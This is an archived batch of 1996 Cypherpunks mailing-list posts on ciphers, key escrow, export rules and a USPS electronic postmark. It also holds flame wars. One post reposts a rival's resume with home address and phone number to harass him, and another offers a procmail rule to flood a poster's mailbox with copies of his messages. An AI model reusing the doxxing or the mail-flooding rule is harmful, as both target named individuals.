If it is a PRNG, you do not have a One Time Pad, period. What you have
is a stream cipher.

Furthermore, past examination has shown you have a POOR stream cipher.

>          It is a PRNG issue that also happens to be an extremely well
>          behaved OTP sequence, with limited but ample entropy, as well.

If the entropy is limited, you do not have a One Time Pad, period, end
of discussion, its over.

>          It meets each and every criteria rationally established for an
>          OTP in all reasonable aspects.

Set by WHOM? By you? Your criteria bear no resemblance to those
accepted in general. Are you one of those people who sells someone a
loaf of bread and says "this is an automobile, by every criterion I
have set for automobiles"?

>          Think about that simple supposition for a moment. What do we
>          mean by an OTP?

Something different from what everyone else means, so it makes no
difference. 

>          Not only that, but you can prove it to yourself, Q.E.D.  We
>          maintain that it is discernible to any knowledgeable person
>          who probes the algorithm, that the only analytical tack that
>          can be mounted against EUREKA is brute force and that is
>          patently impossible.. One of your Cpunk colleagues says he
>          uses Triple DES, 168 bits, and he does not believe that it
>          can be brute forced - I agree, 3-DES, 10^50+ possibilities,
>          cannot be brute forced now, or in the foreseeable future -
>          then what about the EUREKA's 10^34322 possibilities,
>          10^34271+ greater than 3-DES? No way, not now, not ever.
>          Furthermore, EUREKA is an order, or more, magnitude faster
>          than triple DES, easier to use, much more secure, etal.

I believe that we have already established that your cipher is easy to
crack, so your claims that it is hard to crack really don't matter.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Wed, 16 Oct 1996 19:41:29 -0700 (PDT)
To: Duncan Frissell <frissell@panix.com>
Subject: Re: The Great Reducer: Line of the Year
In-Reply-To: <3.0b19.32.19961007143221.00a201e0@panix.com>
Message-ID: <Pine.BSF.3.91.961016223921.9764N-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 7 Oct 1996, Duncan Frissell wrote:

> At 11:02 AM 10/7/96 -0400, Brian Davis wrote:
> >> > I'm 
> >> > well aware that the SC disagrees, but that is simply because they are 
> >> > entirely wrong in this matter.
> >
> >
> >Well then, it is a good thing we have Mr. Bell here to set us all straight!
> >
> >EBD
> 
> The Supremes frequently err (Hugo Black's decision in Korematsu vs U.S. par
> example).  In a larger sense, the existance of an entity like the Supreme
> Court will probably become generally recognized as "wrong" as we transition
> to non coercive methods of social organization.
> 
> Slavery and bleeding were once considered natural and appropriate.   
> 
> DCF


Yes, the Supreme Court follows the election returns.  And it is a living 
Constitution. But I suspect the Nine's view will prevail far past Mr. 
Bell's existence.

EBD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 16 Oct 1996 20:50:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [JIM RAY] Does anyone have the complaint number for Florida Barr Assocoation?
Message-ID: <6kBXVD12w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



I want to complaint to the FLoria Bar Association about Jim Ray sending
complaints to postmaster@bwalk.dm.com (quoted before).  Can someone
please post their contact address?

The lying motherfucker's resume follows.

<html>



<head>

<title></title>

</head>



<body>



<h2 align=center>

JAMES M. RAY

</h2>



<pre>

JAMES M. RAY

1150 Madruga Ave. #A-101

Coral Gables, FL 33146

(305) 666-1029

http://www.shopmiami.com/prs/jimray

e-mail  liberty@gate.net



EDUCATION:

UNIVERSITY OF MIAMI SCHOOL OF LAW

Juris Doctor - May 1995



Coral Gables, Florida

* Society of Bar & Gavel, LAW SCHOOL NEWSPAPER OPINIONS EDITOR



UNIVERSITY OF FLORIDA

Bachelor of Science, Psychology - May 1986



Gainesville, Florida



EXPERIENCE:

UNITED STATES DISTRICT COURT

Sept. 1994 to May 1995



	Southern District of Florida

	* legal Intern For US District Judge  William M. Hoeveler

Attended trials and hearings. Wrote memoranda and orders. Conducted Lexis, Westlaw,

and library research on a range of civil and criminal law issues including: possible

fines in a corporate contempt of Court proceeding, 2255 prisoner claims, insurance,

drug-smuggling and failed Savings & Loan cases. Organized and updated library.





DADE COUNTY GUARDIAN AD LITEM  PROGRAM

Jan. 1994 to Aug. 1994



Miami, Florida

* Volunteer Summer Intern, GAL

Spoke for children in family Court hearings. Conducted interviews and investigations.

Wrote reports, memoranda for attorneys, and performance agreement contracts.



UNIVERSITY OF MIAMI

Oct. 1993 to Aug. 1994



	Miami, Florida

	* research Assistant For Law Professor Susan Stefan

Conducted legal and CD-ROM database research for articles and speeches.

Assisted in preparation of an ADA lawsuit.



PEKNY INDUSTRIES, INC.

1987 to 1990



St. Petersburg, Florida

* Small Business Partner, Vice-president & Director of Marketing

Supervised and performed research at the United States Patent & Trademark Office.

Consistently the top anchor seller at boat shows. Analyzed and satisfied customer

needs.



FLORIDA STATE HOUSE OF REPRESENTATIVES

Election 1992



Dade County, Florida

* Libertarian Party Candidate for District 113

Ran successful local and statewide ballot access petition drives.

Participated in panel discussions and debates. Held TV and newspaper interviews.

Organized a lean, clean campaign.



CHARLOTTE COUNTY ORANGE GROVE

1978 to Present



Punta Gorda, Florida

* Farmer  (part time)

Transported and sold citrus and exotic fruit.



ACTIVITIES:

PADI Advanced Open Water SCUBA Diver. Competent sailor, fisherman and power boater.

Florida State House Messenger. Volunteer high-school teacher. Recording for the Blind

law book reader. Hurricane Andrew volunteer. Internet Guide. Amateur HTML

Programming. PGP encryption teaching for e-mail confidentiality and authentication.



</pre>

<hr>

<p align=center>

<center>

Return to Jim's Home Page

</p>

</body>



</html>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Wed, 16 Oct 1996 06:40:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: LACC: Japan imposing crypto export restrictions!
In-Reply-To: <199610160435.GAA00926@basement.replay.com>
Message-ID: <199610161339.XAA14264@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> Another Cypherpunks exclusive!
> 
> Bowing to US pressure, the Japanese Ministry of International Trade and Industry (MITI) has quietly made changes to Japanese crypto export regulations.
> 
> In the past, export of crypto products from Japan was unregulated. The exporter had to file a pro-forma export declaration with MITI. The new regulations, imposed in recent weeks without public announcement, require the exporter to state the ultimate recipient of the crypto product. MITI then conducts a lengthy approval process that can take many weeks.
> 
> It is widely assumed that the US used the thread of trade sanctions to bring about this 180 degree turn in the attitude of the Japanese government.

How is it "widely assumed" when we have "Cypherpunks exclusive" ...
"quietly made changes" ... and "without public annoucement"?

-- 
"Of all tyrannies a tyranny sincerely  exercised for the good of its victims  
 may be the most  oppressive.  It may be better to live under  robber barons  
 than  under  omnipotent  moral busybodies,  The robber baron's  cruelty may  
 sometimes sleep,  his cupidity may at some point be satiated; but those who  
 torment us for own good  will torment us  without end,  for they do so with 
 the approval of their own conscience."    -   C.S. Lewis, _God in the Dock_ 
+---------------------+--------------------+----------------------------------+
|Julian Assange RSO   | PO Box 2031 BARKER | Secret Analytic Guy Union        |
|proff@suburbia.net   | VIC 3122 AUSTRALIA | finger for PGP key hash ID =     |
|proff@gnu.ai.mit.edu | FAX +61-3-98199066 | 0619737CCC143F6DEA73E27378933690 |
+---------------------+--------------------+----------------------------------+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: um@c2.net (Ulf Moeller)
Date: Wed, 16 Oct 1996 15:53:46 -0700 (PDT)
To: everheul@NGI.NL (Eric Verheul)
Subject: Re: binding cryptography
In-Reply-To: <01BBBA25.B9961E40@port13.ztm.pstn.rijnhaave.net>
Message-ID: <m0vDekD-0003bkC@ulf.mali.sub.org>
MIME-Version: 1.0
Content-Type: text/plain


> >Can you imagine that anyone would ever create a program that tries to
> >look like a conforming implementation, but generates invalid "binding"
> >data -- when it is so much easier to simply use PGP, and (if
> >necessary) disguise that fact using the government-approved encryption
> >software?  I don't, so in my opinion the verification process is
> >abolutely useless.
> Can you imagine what would happen if governments would (help to) set up
> a system that has no safeguards at all, i.e.  that could give criminals
> all the anonimity and confidentiality they need?

Sorry if my formulation was unclear. I ment to point out that it is
acutally easier to commit fraud in a way that is undectectable than
in a detectable way. So on the assumtion that the concept of binding
cryptography is a good thing, this scheme is flawed.


But to answer your question: Encryption software has already been
available for years. You may argue that PGP is not very user-friendly,
but it is secure and every computer user who takes the time to read
the manual can use it. So nothing much would happen that will not
happen anyway or has already happened.

> car, bicycle, house etc.). That is a fact of life; one I hate. So the
> point is: where is the middle of giving up freedom and stopping
> criminals?

But since - as you admit - it is not possible to stop criminals, the
question is: Do you want to cause a dramatic drawback in privacy and
create new potential security hole just in order to force criminals to
do a few hour's work of installing a secure encryption system from the
Internet, or when that is illegal buy it on the black market?

> We have set up the TRPs in such a flexible way that anybody could find
> one he can trust, one might even set up his own TRP.

Then it is not even necessary to use additional software to circumvent
government access. The user can simply configure himself as TRP for
the inner layer of encryption and the official one in the outer layer.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: douzzer@MIT.EDU
Date: Thu, 17 Oct 1996 00:45:39 -0700 (PDT)
To: snow@smoke.suba.com
Subject: Re: AW: Binding cryptography - a fraud-detectible alternative to key-escrow
Message-ID: <199610170745.AAA12078@lechter.chautauqua.com>
MIME-Version: 1.0
Content-Type: text/plain


i'm neither nearsighted nor a fool. don't presume.

i can accept the tracking of fossil fuels, bleach, fertilizer,
sulphuric-acid-based drain cleaner, essentially any non-edible or
psychoactive chemical. clearly purchase of non-edible chemicals below
a threshhold quantity does not present a credible threat, so there's
no reason to invade the privacy of someone who's simply unstopping a
toilet, cleaning laundry, or getting a fillup. schedule the
threshholds so that it is not feasible to drive around to different
stores to collect enough of a chemical to make a threshhold-sized
bomb, for example. the only other way to know if someone has assembled
the ingredients of a bomb is through massive and insidious
surveillance, which is far more objectionable. the tracking is
implemented by recording the purchase in the database via a
point-of-sale unit.  i don't like it, you don't like it, but it's a
good compromise. would you prefer a simple prohibition on the sale of
the more sensitive types of chemicals? of course not.  am i proposing
that the above, or any other scheme or combination of schemes,
comprises a foolproof solution?  of course not.

i think you misunderstood what i meant by "tracking of all
automobiles." don't track where they are (that would be draconian),
track who owns them, and what model and color they are. as far as
tracking deadly weapons: if there were a unified database containing
the ballistic profile of every gun barrel sold, and relating with each
a physically tamper-resistant serial number and current owner, and if
every transfer of weapon ownership required a cryptographically
authenticated exchange with a unified clearinghouse to assure that no
gun is ever transferred to or kept by a convicted violent criminal, i
put to you that a huge reduction in crimes with firearms will
follow. moreover, legitimate ownership and use of guns is not in any
way curtailed by such a system.

"by saying MEAN THINGS, you are hurting people, and that is wrong."

that's total hogwash. your ideas of "mean," "hurt," and "wrong" are
not the same as mine, and that's exactly why i reiterate that
restrictions on what i can think, who i can speak to, what i can say,
and how i say it, are unacceptable. i am often offended and
contemptuous, and i expect to offend and inspire resentment just as
often, and that's fundamental to the human condition. it would be a
disaster of unrivalled proportions if a day were to arrive when all of
humanity is of one mind; fortunately that can never happen.

you got sillier at this point, but i'll finish up.

the government will not protect me, because the government is not
there when i am mugged, carjacked, etc. i know this as something real,
not as something abstract, but through a simple thought exercise it is
not hard to see that this is inevitable.

_prohibition_ and _tracking_ are completely different. the murder,
rape, and robbery of members of the community are prohibited in our
society, as in most (all?) human societies with written laws. a law
which forbids conduct which directly violates the physical or organic
rights of others is a legitimate prohibition.  regulation, e.g. by
tracking, is not the same at all.  i have already explained what i
mean by tracking: it is simply the concentration of data regarding the
transfer of (and therefore, responsibility for) substances and
machinery that when abused has a dire impact on the rights of other
individuals.

now on "the torture thing": i wasn't trying to be imaginative, to be
honest i just jumped at a chance to construct a trite paragraph like
that. it was fun for me; i hope you enjoyed it. as far as what i have
already been through in my life, i have no comments to offer. as far
as the susceptibility of others to have their wills bent by torture, i
have no doubt they are far more vulnerable on average than i am.

"just make it unnecessary to carry out terrorist acts."

it's clear to me now that you didn't take enough time thinking out
your flammage. "just make it unnecessary" is exactly what i am saying
here; if victimless crimes were abolished (and if the income tax were
abolished, which i didn't happen to mention), we'd be a lot closer to
removing the impetus for terrorist acts (and for any sort of
insurrection against the state). however, terrorism will never
disappear completely, because there will always be ethically
impoverished people who adopt agendas that are predicated on
domination and enslavement, and who manipulate weak people with
ideological psychobabble to get their way. that's why someone has to
track chemicals and killing machines regardless of the configuration
of laws.


what does cryptography have to do with all this toxic waste?

i am willing to forego a certain amount of privacy regarding the
weapons i own, the chemicals i buy, and the vehicles i drive, so that
i can have complete privacy regarding the information i store and the
conversations i have. of course, more obviously, i am willing to
forego a certain amount of privacy about my guns, cars, and drugs, so
that i can have and use my guns, cars, and drugs.

-douzzer

p.s. note that i am not on this list - i will not see a reply if you
don't send it to me.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Litt <littlitt@MIT.EDU>
Date: Wed, 16 Oct 1996 21:48:52 -0700 (PDT)
To: cypherpunks@toad.com
Subject: USPS electronic postmark
Message-ID: <199610170449.AAA01356@bst-ma1-13.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Today I was at the Internet Expo in Boston and I sent myself a
postmarked email from the USPS booth. It is enclosed below for all to
scrutinize.

Here is an excerpt from the literature they had:

  "The United States Postal Service has entered into a limited market
  test phase for the Electronic Postmark, Archival, and Authentication
  Services. This is a fee for service test.

  The Electronic Postmark applies a time and date stamp to an electronic
  document, hashes it, and digitally signs the document with a Postal
  Service private key.

  ...

  The Electronic Postmark Processor time and date stamps the message,
  hashes it using the SHA hashing algorithm and digitally signs this
  with the Postal Service DSA 1024-bit private key. For the market trial
  we will use CCITT X.500 Section X.509 V3 certificate public/private
  key technology with the federal standard Digital Signature Algorithm."

I will also paraphrase something that was said by one of the people at
the booth:

  "We always send the message itself as an attachment. The message that
  you see at first shows the postmark, and warns you not to open the
  attachment if you are not the intended recipient. Just as with normal
  mail, it is a federal crime to double click on the attachment to view
  the contents of the message if the message is not for you."

Further BS of this nature can be found at:

http://www.aegisstar.com/uspsepm.html

My favorite line from that web page is:

  Postal ECS plans on regularly changing the Postal Service private key
  as recommended by cryptography experts, which will only require the
  redistribution of the VERIFY.DLL file to Mail Reader users.

Wow, it _only_ requires distributing a new public key to all users!

As stated above, here is the message in its entirety, exactly as it
arrived in my mailbox. Below that is the base64 decoded for your
convenience.

-jon

------- Forwarded Message

Received: from PACIFIC-CARRIER-ANNEX.MIT.EDU by po9.MIT.EDU (5.61/4.7) id AA03633; Wed, 16 Oct 96 13:34:14 EDT
Received: from corpmail.aegisstar.com by MIT.EDU with SMTP
	id AA26235; Wed, 16 Oct 96 13:34:13 EDT
Received: from router1.fac1.aegisstar.com by aegisstar.com (SMI-8.6/SMI-SVR4)
	id KAA03398; Wed, 16 Oct 1996 10:33:24 -0700
From: demo3@hypersurf.com
Received: by router1.fac1.aegisstar.com (SMI-8.6/AegisRouter)
	id RAA10130; Wed, 16 Oct 1996 17:33:40 GMT
>X-Special-Header: Wed Oct 16 17:33:19 GMT 1996
Message-Id: <0.0.0.0.21828.1996.Oct.16.17.33.19@4.1.aegisstar.com>
Date: Wed Oct 16 17:33:19 GMT 1996
Reply-To: demo3@hypersurf.com
Errors-To: demo3@hypersurf.com
Subject: test postmark
To: littlitt@MIT.EDU
Mime-Version: 1.0	(Aegis Star MIME v1.0)
Content-Type: multipart/mixed; boundary="PART.BOUNDARY.0.0.0.0.21828.1996.Oct.16.17.33.19@4.1.aegisstar.com"


- --PART.BOUNDARY.0.0.0.0.21828.1996.Oct.16.17.33.19@4.1.aegisstar.com
Content-type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
Content-Description: read1st.txt
Content-Name: read1st.txt

*****************************************************************************
*******   U.S. Postal Service Electronically Postmarked Mail
*******   Date & time: 1996/10/16 17:33:10 GMT
*******   ECTPID: 00000119961016173310,3317
*******   Postmarked in Palo Alto, California
*****************************************************************************
NOTICE: The Postal Service preserves the security of all electronically
postmarked messages in its custody from unauthorized interception,
inspection or reading of contents, or tampering, delay or other
unauthorized acts.

The attached message has been sent to you Electronically Postmarked
by the United States Postal Service. The contents have been digitally
signed and can be authenticated using the U.S. Postal Service Mail
Reader (you can receive a free copy from http://www.aegisstar.com
or e-mail us at support@aegisstar.com). If you are not the intended
recipient, you are hereby notified that any viewing, dissemination,
distribution, or copying of this message is prohibited.

Only littlitt@mit.edu may view the enclosed message.


- --PART.BOUNDARY.0.0.0.0.21828.1996.Oct.16.17.33.19@4.1.aegisstar.com
Content-type: application/x-USPSpostmarked; name=P0010CF5.msg
Content-Disposition: attachment; filename=P0010CF5.msg
Content-Transfer-Encoding: base64
Content-Description: U.S. Postal Service Mail
Content-Name: P0010CF5.msg

RnJvbSBkZW1vM0BoeXBlcnN1cmYuY29tICBXZWQgT2N0IDE2IDE3OjMzOjAzIDE5OTYNClgt
QUVUWVBFOiBFUE0NClgtSUQ6IDMzMTcNClgtVVNQUy1OT1RJQ0U6ICBUaGlzIGRvY3VtZW50
IGhhcyBiZWVuIGVsZWN0cm9uaWNhbGx5IHBvc3RtYXJrZWQgYnkgdGhlIFVuaXRlZCBTdGF0
ZXMgUG9zdGFsIFNlcnZpY2UNClgtVElNRVNUQU1QOiAgMTk5Ni8xMC8xNiAxNzozMzoxMCBH
TVQNClgtUE9TVEFHRTogIDIyLCA1OTMsIDENClgtU046ICA5ODYNClgtRE46ICBjPVVTQG89
VVNQUy1BZWdpcyBTdGFyIFBpbG90QGNuPVVTUFMsIEFFR0lTDQpYLVVTUFMtTk9USUNFOiAg
RWxlY3Ryb25pYyBQb3N0bWFya2luZyBQaWxvdCBTeXN0ZW0NClgtVVNQUy1QT1NUTUFSSzog
IEVDVFBJRCAgMDAwMDAxMTk5NjEwMTYxNzMzMTAsMzMxNw0KWC1SOiAgOThBNjhGOUY2MTE0
ODRCRUQ5NzI5M0ZBQkVBRkFCQUQyNjMyREZDMA0KWC1TOiAgQUE5QTIwN0Y2OTcwMTlCMjhD
RDI0N0Q0QTkwRkU2OTVFMDZCODQ4Rg0KWC1ERVNUOiBsaXR0bGl0dEBtaXQuZWR1DQo+RnJv
bSBkZW1vM0BoeXBlcnN1cmYuY29tICBXZWQgT2N0IDE2IDE3OjMzOjAzIDE5OTYNCk1lc3Nh
Z2UtSWQ6IDwxOTk2MTAxNjE3MzkuS0FBMjIzNDRAbWVyY3VyeS5oeXBlcnN1cmYuY29tPg0K
RnJvbTogIlVTUFMgRGVtbzMiIDxkZW1vM0BoeXBlcnN1cmYuY29tPg0KVG86IChwb3N0bWFy
a2luZyBzeXN0ZW0pDQpTdWJqZWN0OiB0ZXN0IHBvc3RtYXJrDQpEYXRlOiBXZWQsIDE2IE9j
dCAxOTk2IDEzOjM0OjIyIC0wNDAwDQpYLU1TTWFpbC1Qcmlvcml0eTogTm9ybWFsDQpYLVBy
aW9yaXR5OiAzDQpYLU1haWxlcjogTWljcm9zb2Z0IEludGVybmV0IE1haWwgNC43MC4xMTU1
DQpNSU1FLVZlcnNpb246IDEuMA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluOyBjaGFyc2V0
PUlTTy04ODU5LTENCkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IDdiaXQNCg0KdXNwb3N0
OmxpdHRsaXR0QG1pdC5lZHUKCnRlc3QgbWVzc2FnZQpoaQoKVGhpcyBpcyBvbmUgb2YgdGhl
IGZpcnN0IFVTUFMgRUNTIGVsZWN0cm9uaWMgcG9zdG1hcmtzLiAgS2VlcCBpdCBmb3IgZnV0
dXJlCnBoaWxhdGVsaWMgdmFsdWUhCgo=

- --PART.BOUNDARY.0.0.0.0.21828.1996.Oct.16.17.33.19@4.1.aegisstar.com--


------- End of Forwarded Message

base64 decoded:

>From demo3@hypersurf.com  Wed Oct 16 17:33:03 1996
X-AETYPE: EPM
X-ID: 3317
X-USPS-NOTICE:  This document has been electronically postmarked by the United States Postal Service
X-TIMESTAMP:  1996/10/16 17:33:10 GMT
X-POSTAGE:  22, 593, 1
X-SN:  986
X-DN:  c=US@o=USPS-Aegis Star Pilot@cn=USPS, AEGIS
X-USPS-NOTICE:  Electronic Postmarking Pilot System
X-USPS-POSTMARK:  ECTPID  00000119961016173310,3317
X-R:  98A68F9F611484BED97293FABEAFABAD2632DFC0
X-S:  AA9A207F697019B28CD247D4A90FE695E06B848F
X-DEST: littlitt@mit.edu
>From demo3@hypersurf.com  Wed Oct 16 17:33:03 1996
Message-Id: <199610161739.KAA22344@mercury.hypersurf.com>
From: "USPS Demo3" <demo3@hypersurf.com>
To: (postmarking system)
Subject: test postmark
Date: Wed, 16 Oct 1996 13:34:22 -0400
X-MSMail-Priority: Normal
X-Priority: 3
X-Mailer: Microsoft Internet Mail 4.70.1155
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

uspost:littlitt@mit.edu

test message
hi

This is one of the first USPS ECS electronic postmarks.  Keep it for future
philatelic value!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Thu, 17 Oct 1996 03:37:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Bidzos clarifies RSA's position on Clipper IV
Message-ID: <199610170940.CAA13270@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


In a presentation at CommerceNet'96 in California, Jim Bidzos, CEO of RSA, clarified RSA's position on Clipper IV.

RSA supported IBM's efforts to establish a *commercial* key escrow system. For reasons that aren't clear to me, this commercial key escrow system turned into Clipper IV. RSA does not like or support the use of this system for GAK and will create a webpage explaining RSA's position on their site.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Thu, 17 Oct 1996 04:50:18 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [NOISE] I never knew that Dimitri Vulis was a net.legend
In-Reply-To: <Pine.SCO.3.93.961016133809.11688G-100000@grctechs.va.grci.com>
Message-ID: <aJkXVD17w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Mark O. Aldrich" <maldrich@grci.com> writes:
> (at least me) gave him credit for.  The notion that the idiom "dandruff
> covered" is indicative of anti-semitism is one passage that I found rather
> amusing.

Timmy May has tons of dandruff (and dried up semen) in his beard.
Is he Jewish???

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Thu, 17 Oct 1996 02:36:51 -0700 (PDT)
To: dougr@skypoint-gw.globelle.com
Subject: Re: [NOISE] I never knew that Dimitri Vulis was a net.loon
Message-ID: <199610170936.FAA166900@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: dougr@skypoint-gw.globelle.com, cypherpunks@toad.com,
 dlv@bwalk.dm.com
Date: Thu Oct 17 05:34:16 1996
[This post has nothing I can think of to do with cryptography, but it is 
high time to take some of the heat off Tim from this loon. Hey Dmitri, I've 
got a couple of cats, too!]

Doug wrote:

> On Wed, 16 Oct 1996, Mark O. Aldrich wrote:

...

> > Check it out for yourself at
> > http://www.math.uiuc.edu/~tskirvin/home/legends/legends3.html
> > 
> 
> The above is very good, but there's not nearly as much on Vulis in it. 
> For anyone else who may have missed it, here is the original link again:
> 
> http://www.math.harvard.edu/~verbit/scs/cranks/from-Shlomo.html#vulis
> 
> This one absolutely_boggles_my_mind.  But check them both out.

These do shed some light on this guy, and he is an incredible source of 
noise. I've killfiled the loon long ago, but Doug alerted me to his rant 
about me, so I dug his posts out of the trash. I had no idea he was his own 
sysadmin, though I suppose doing that is one way to get away with being as 
annoying as he is. IMO it's obvious to all that the recent messages with 
relevant-looking subjects bashing Tim and coming through the remailers are 
from him, and I finally got annoyed.

The resume he posted is old, and the address and phone number, plus some of 
the other information, has changed or is inaccurate. I am in the process of 
redoing my home page, but it's taking a while. Also, the Florida Bar has 
very little sway over me these days since:

1. My life seems to be going in a different direction.

2. I've started saying what I think about political influence in the Florida 
judiciary, following a particularly-smelly ruling in a political ballot 
access case. (I decided that the Florida Supreme Court was "in play" until 
November 5.) The facts were featured in the Miami Herald and then here in 
"DUO_pol" [thanks JYA].

 From what I hear, my "Castro should look at doing this" suggestion and my 
opinion of their blinkered reading of the state & federal Constitution(s) 
has gotten back to them and (just as I had hoped) has not been received too 
well. That's life. Maybe next time I'll be nicer, or maybe next time they'll 
rule differently (i e fairly) and avoid my sarcasm.

If Dmitri (or anyone else) wants to complain about me anyway (not that it is 
likely to change my behavior) the Florida Bar hotline is at (800) 235-8619. 
I don't know if this is a Florida-only or national 800 number, but you are 
welcome to try it and see, Dmitri. Have fun, but give it a rest on Tim and 
start hollering about me. I agree with Tim on lots of stuff anyway, and 
(despite my killfiling you long ago) I regularly see your ranting about him 
in others' messages responding to your trash. I consider myself a friend of 
Tim May's (though I have never met him) so rant about me (and _these_ cats) 
for a while.
JMR


One of the "legitimate concerns of law enforcement" seems to be
that I was born innocent until proven guilty and not the other
way around. -- me

Defeat the Duopoly! Vote Harry & Jo http://www.HarryBrowne96.org/
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:jmr@shopmiami.com> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMmX9oW1lp8bpvW01AQG3RwP/Qne8Y1A+ECf2/FIIJu9OpCQtt6CqPsXH
3jhHURblftCSQUyuJqob/LXAFoamTmbT7QnSqvbX/VlrRp96WBAmViULzeQckGy+
CHFjo0Umnb14PGCaKwbwQb1kgFXxbinbvjDBZjJAAaDGfTUAgDCnekfgXZ+eMBtC
oczNcbs1/cs=
=eVYp
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 16 Oct 1996 21:00:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Societal Policing Association (SPA) Sues Sameer!
Message-ID: <199610170400.GAA09969@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Subject: SOCIETAL POLICING ASSOCIATION SUES COMMUNITY CONNEXION!!
To: cypherpunks@toad.com
Date: Wed Oct 16

Here's what I have learned about the SPA, the Societal Policing
Association, a group supported by the CyberAngels, the Family Decency
OrganizatIon, and the Association of Police Chiefs.

NotE their term "contributory infringement" for anyone who fails to agree
to report suspicious behavior. ("A citizen-unit who neglects to perform his
societal-unit duties and who stands by as thoughtcrime is committed is just
as guilty as the active member of the crime.")  Details are in:
http://www.spa.org/thoughtcrime/orwell.htm.

"Anyone who knows or should have known that he or she is  witnessing,
inducing, applauding or tangentially contributing to infringement of any of
the moral and decency rights by  another person is liable for contributor
infringement. "

 -- posting of views critical of authority 
 -- linking to FTP or Web sites where unauthorized viewpoints may be obtained 
 -- informing others of FTP sites were such views may be unlawfully obtained 
 -- aiding others in locating or using unauthorized software 
     supporting sites upon which the above information may be obtained 
     allowing sites where the above information may be obtained to exist on a  
     server 

Then there's their Vicarious Liability for Infringement by Another Person, 
outlined by:

"Anyone who has the authority and ability to control another person and who
fails to do so is vicariously liable for the infringement of another
person."

***

SPA Files Morality Suits Against ISPs and End Users
Internet Decency Campaign Launched 

(Oct.10, 1996 --Washington, D.C.) -- The Societal Policing Association (SPA) 
announced today that it has filed five civil lawsuits for morality
violations occurring on the Internet. Three of the lawsuits were filed 
against Internet service providers (ISPs), and the remaining two were filed 
against individual end users. Additionally, SPA launched its Internet
Decency Campaign, which includes education and enforcement components, in 
an effort to educate and work cooperatively with ISPs regarding morality
and decency violations. ISPs who immediately enroll their employee-units in
decency reeducation programs and who agree to participate in SPA's program
to stamp out illegal thoughts will receive immunity from SPA lawsuits and
will receive a pro rata share of the collected loot from other ISPs sued by
the SPA. 

ISP lawsuits were filed on Oct. 7 and 8 against Community ConneXion of Oakland, 
Calif.; GeoCities of Beverly Hills, Calif.; and Tripod Inc. of Williamstown, 
Mass. The SPA members named as plaintiffs in all three suits were the
Christian Coalition, the Anti-Defamation League of B'nai Brith and the
Million Aryan March. In each case, SPA first  contacted the ISP and
requested that the offensive thoughts  be purged, but the ISPs cited the
notoriously Communistic "First Amendment" and the anti-Christian
"Electronic and Communications Privacy Act" and refused to cooperate. 

"These lawsuits send a clear signal to ISPs and end users that neither
so-called "free thinking" nor failure to pay our protection fee will be
tolerated. The Internet does 
not provide a safe haven for these types of activities," said Emmanuel
Goldstein, SPA 
Reichsfuhrer. 

"Our intentions are to work cooperatively with ISPs. A key element of the IAPC 
is the ISP Political  Reeducation Program devoted to alerting ISPs to their
potential 
state of sin and providing them with the tools and moral guidance to save 
themselves," said Winston Smith, SPA's Reeducation Coordinator. 





--Keyser Soze, Political Reporter





--








--




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 16 Oct 1996 22:16:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Solution to the Dimitri Problem
In-Reply-To: <Pine.3.89.9610162206.A13179-0100000@netcom16>
Message-ID: <199610170515.HAA19243@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Boy, it seems that our resident KOTM is now just posting for the hell of 
it - just get a kick out of seeing his own messages on this list.  
Therefore, I have a solution to this.  Since he likes to see his own 
words so much, why don't we start sending him multiple copies of all of 
his words of wisdom?  The following recipe for Procmail does the trick 
just fine.

:0
* ^(From|Sender).*dlv@bwalk.dm.com
! dlv@bwalk.dm.com

This recipe could also be modified to mail him multiple copies of his 
messages or anything you feel that he should see.

